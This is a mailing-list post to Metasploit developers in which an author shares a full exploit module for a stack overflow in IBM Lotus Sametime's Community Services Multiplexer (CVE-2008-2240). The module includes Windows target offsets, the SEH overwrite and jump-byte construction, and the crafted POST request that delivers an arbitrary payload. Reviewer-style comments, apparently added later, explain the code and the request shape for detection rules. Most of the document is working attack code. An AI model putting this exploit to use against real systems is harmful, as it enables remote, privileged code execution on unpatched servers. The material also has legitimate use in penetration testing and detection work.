Hi Patrick,
I saw you've added domino_sametime_stmux.rb to the dev svn.
I wrote the same exploit a couple of months ago; maybe you could add some of my offsets/targets to your module.

Regards,
riaf

##
# $Id: ibm_lotus_sametime_stmux.rb 2008-06-01 20:00:00Z riaf $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	# Metasploit module for CVE-2008-2240 / BID 29310: a stack overflow in the
	# IBM Lotus Sametime Community Services Multiplexer (stmux). Per the
	# description below, Sametime releases before 7.5.1CF2 and 8.0.1 are
	# affected; the four targets cover 7.5, 7.5.1 and 8.0.0 on Windows.
	#
	# HttpClient supplies the connect / send_request_raw calls used in #exploit.
	include Msf::Exploit::Remote::HttpClient

	# Registers the module metadata and the RPORT option with the framework.
	#
	# Each target's 'Rets' triple is consumed in #exploit as
	#   [0] the address written over the exception handler (packed little-endian),
	#   [1] repeat count for the "\x5b" (popebx) bytes,
	#   [2] repeat count for the "\x61" (popad) bytes.
	# All four targets share the same address, 0x7c3410c2; only the counts differ.
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'IBM Lotus Sametime Community Services Multiplexer Stack Overflow',
			'Description'    => %q{
					This module exploits a stack overflow in Lotus Sametime
				prior to version 7.5.1CF2 and 8.0.1. 
			},
			'Author'         => [ 'riaf' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:$',
			'References'     =>
				[
	  				['BID', '29310'],
					['CVE', '2008-2240'],
				],
			# Payload exits through the SEH path, matching the SEH-based trigger below.
			'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'seh',
                                },
			'Privileged'     => true,
			'Payload'        =>
				{
					# Up to 1024 bytes of encoded payload are sent as the POST body.
					'Space'           => 1024, 
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					# NOTE(review): "Windows 2002" is not a product name; this is
					# presumably "Windows 2000 SP4" - confirm before renaming.
					['Lotus Sametime 7.5 Windows 2002 SP4', { 'Rets' => [ 0x7c3410c2, 3, 268 ] }],
					['Lotus Sametime 7.5 Windows 2003 SP2', { 'Rets' => [ 0x7c3410c2, 4, 269 ] }],
					['Lotus Sametime 7.5.1 Windows 2003 SP2', { 'Rets' => [ 0x7c3410c2, 5, 269 ] }],
					['Lotus Sametime 8.0.0 Windows 2003 SP2', { 'Rets' => [ 0x7c3410c2, 4, 269 ] }],
				],
			'DisclosureDate' => 'May 21 2008'))

			# Only the port is registered: RPORT defaults to 1533, the port this
			# module assumes the multiplexer listens on (not the usual HTTP port).
			register_options( [ Opt::RPORT(1533) ], self.class )
	end

	# Builds the overflow string, embeds it in the request URI and sends the
	# encoded payload as the POST body, then hands off to the payload handler.
	#
	# Request shape (the part worth matching in detection rules): a POST to
	# /CommunityCBR/CC.39.<overflow>/ on RPORT, where <overflow> is roughly
	# 350 bytes (44 + 29 bytes of random lowercase filler, the fixed opcode
	# bytes, and the per-target repeat counts) and the body is the encoded
	# payload. send_request_raw is given a 5-second timeout.
	def exploit
		# NOTE(review): send_request_raw normally opens its own connection, so
		# this explicit connect may be redundant - confirm against the
		# HttpClient mixin version in use.
		connect

		# Fixed-length random lowercase filler on either side of the handler address.
		pad1 = rand_text_alpha_lower(44)
		pad2 = rand_text_alpha_lower(29)
		# Single-byte opcodes repeated per the target's counts (Rets[1], Rets[2]).
		popebx = "\x5b" * target['Rets'][1] 
		popad = "\x61" * target['Rets'][2]
		# Three-byte sequence placed last; the name indicates a jump via esp.
		jmpesp = "\xff\x24\x24"
		# Four-byte conditional-jump pair placed immediately before the address.
		jmp = "\x74\x23\x75\x21"
		# Rets[0] packed as a 32-bit little-endian value ('V').
                seh = [target['Rets'][0]].pack('V')
		post = payload.encoded

		sploit = pad1 + jmp + seh + pad2 + popebx + popad + jmpesp

		# Address is printed as 8 hex digits for the operator's log.
		print_status("Trying to exploit target #{target.name} 0x%.8x..." % target['Rets'][0])

		send_request_raw({
                        'uri'          => "/CommunityCBR/CC.39.#{sploit}/",
                        'method'       => 'POST',
			# NOTE(review): length (characters) rather than bytesize; these are
			# equal only if the encoded payload is a binary string - confirm on
			# Ruby >= 1.9.
			'headers'      => { 'Content-Length' => post.length },
			'data'	       => post 
                }, 5)		

		handler
	end

end



_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
